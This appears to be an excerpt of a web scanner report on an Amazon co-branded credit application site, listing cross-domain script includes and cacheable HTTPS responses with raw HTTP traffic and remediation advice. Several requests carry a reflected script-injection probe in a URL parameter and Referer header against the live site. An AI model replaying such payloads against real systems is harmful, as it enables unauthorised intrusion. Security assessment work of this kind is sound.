<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css">
<script>
...[SNIP]...
<!-- PR91693 Abondanment popup -->


<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css">


<!--PR71295 Change start-->
...[SNIP]...
<input type="hidden" name="ssn_0020" value="" /> <img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/padlock.gif" alt="This is a secure online application." />
           
               </td>
...[SNIP]...
<td><img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/spacer.gif" width="100" height="1"> <span class="app_headerbody_txt">
...[SNIP]...
<!-- PR91693 Abondanment popup -->


<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css">

<table class="app_impinfo_table" cellspacing="0" cellpadding="0">
...[SNIP]...
</span>
   

    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
</span>
   
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#Privacy" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
</span>
           
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#Consent" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
</span>
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/TermsConditions.pdf" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
</span>
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/TermsConditions_spanish.pdf" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
</span>
   
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/TermsConditions.pdf" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
</span>
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/CardGuideToBenefits.pdf" target="_blank">
    <span class="app_secheaderbody_txt">
...[SNIP]...
<!-- PR91693 Abondanment popup -->


   <link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css">
   
<!--PR70610 Gen3 Change Starts-->
...[SNIP]...
</span>
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm" target="_blank" onClick="temp1();">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
<!-- PR91222 starts -->
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#consent" target="_blank">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
<!-- PR91222 ends -->
                           
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#Privacy" target="_blank">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
<!-- PR90513 Changes Ends -->
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#Consent" target="_blank">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
</span>
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#Consent" target="_blank">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
</a>
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.htm#Privacy" target="_blank">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
</span>
                           <a href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/TermsConditions.pdf" target="_blank">
                           <span class="app_acctsec_body_txt">
...[SNIP]...
<td valign="top" class="appsign_padlock">
                   
<img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/padlock.gif" alt="This is a secure online application.">
                   
                   </td>
...[SNIP]...
<!-- PR90596 Changes starts -->
                       
                       <img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/accept-and-submit.gif" border="0" alt="Accept & Submit"></a>
...[SNIP]...
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/omniture.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="https://mpsnare.iesnare.com/snare.js">
</script>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 6 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c628ed5120c5e547e9472fd49253

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:05 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 358
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<html>
<head>
<link rel="stylesheet" href="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">
</head>
   <script language="JavaScript" SRC="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/js/TermsConditions.js" height="100%"></script>
...[SNIP]...

5.2. https://www.onlinecreditcenter2.com/EApplyCommercial/footer.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/footer.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /EApplyCommercial/footer.do HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Content-Length: 23
Cache-Control: max-age=0
Origin: https://www.onlinecreditcenter2.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=cf209e5ba73550128f2e147f9ff3

fwdPageCode=6&langId=en

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:48 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 1314


<title>WebSite Usage Agreement</title>


<HTML>
<script language="javascript">

function callStatic()
{    
//    alert('call Static');
   //aler
...[SNIP]...
</script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf_eapply.js"></script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf.js"></script>
...[SNIP]...

5.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:44 GMT
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=cf209e5ba73550128f2e147f9ff3; Path=/EApplyCommercial; Secure
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 10066


<!-- PR60796 Chanages start -->


<!-- PR60796 Chanages Ends -->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Cr
...[SNIP]...
</script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf_eapply.js"></script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf.js"></script>
...[SNIP]...

5.4. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3Ddefault%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_g1_apply%26ts%3D7ptf9dgqk1wgu0lo0s64fem79s2r35v%26place%3Durl%26inc%3Dpoinvsp%26pr%3Dibprox%26ad%3D0001%26plattr%3Dnone%26imp%3DA8NVK8AAPHZBS&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:01 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 45075


<!--PR90699 Changes Starts -->

<!--PR90699 Changes Ends-->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Credit Line
...[SNIP]...
</script>
<script language="JavaScript" src="https://chb.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf_eapply.js"></script>
<script language="JavaScript" src="https://chb.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf.js"></script>
...[SNIP]...

5.5. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/jsp/application/Internet/AgreementSummary.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /eapplygen2/jsp/application/Internet/AgreementSummary.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c72aa8c1bf5b6aa482b7011b28b7

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:39 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 1929
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<html>

<script language="JavaScript" SRC="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.js" height="100%"></script>
...[SNIP]...

5.6. https://www.onlinecreditcenter2.com/eapplygen2/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3DPLCC_new_v1%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_c2_apply%26ts%3Db2a5qy6gcohj49h3hcolu9vxpmcb5ex%26place%3Dhuc%26inc%3Dplcc6%26pr%3Dconplcc%26ad%3D6MC0%26plattr%3D6MPSAC%26imp%3DA336G5NZJ23B5Q&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:37 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 108209


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/omniture.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="https://mpsnare.iesnare.com/snare.js">
</script>
...[SNIP]...

6. Cacheable HTTPS response  previous  next
There are 5 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


6.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

Request

GET /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c628ed5120c5e547e9472fd49253

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:05 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 358
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<html>
<head>
<link rel="stylesheet" href="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">
</head>
   <script
...[SNIP]...

6.2. https://www.onlinecreditcenter2.com/EApplyCommercial/footer.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/footer.do

Request

POST /EApplyCommercial/footer.do HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Content-Length: 23
Cache-Control: max-age=0
Origin: https://www.onlinecreditcenter2.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=cf209e5ba73550128f2e147f9ff3

fwdPageCode=6&langId=en

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:48 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 1314


<title>WebSite Usage Agreement</title>


<HTML>
<script language="javascript">

function callStatic()
{    
//    alert('call Static');
   //aler
...[SNIP]...

6.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3Ddefault%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_g1_apply%26ts%3D7ptf9dgqk1wgu0lo0s64fem79s2r35v%26place%3Durl%26inc%3Dpoinvsp%26pr%3Dibprox%26ad%3D0001%26plattr%3Dnone%26imp%3DA8NVK8AAPHZBS&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:01 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 45075


<!--PR90699 Changes Starts -->

<!--PR90699 Changes Ends-->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Credit Line
...[SNIP]...

6.4. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/jsp/application/Internet/AgreementSummary.jsp

Request

GET /eapplygen2/jsp/application/Internet/AgreementSummary.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
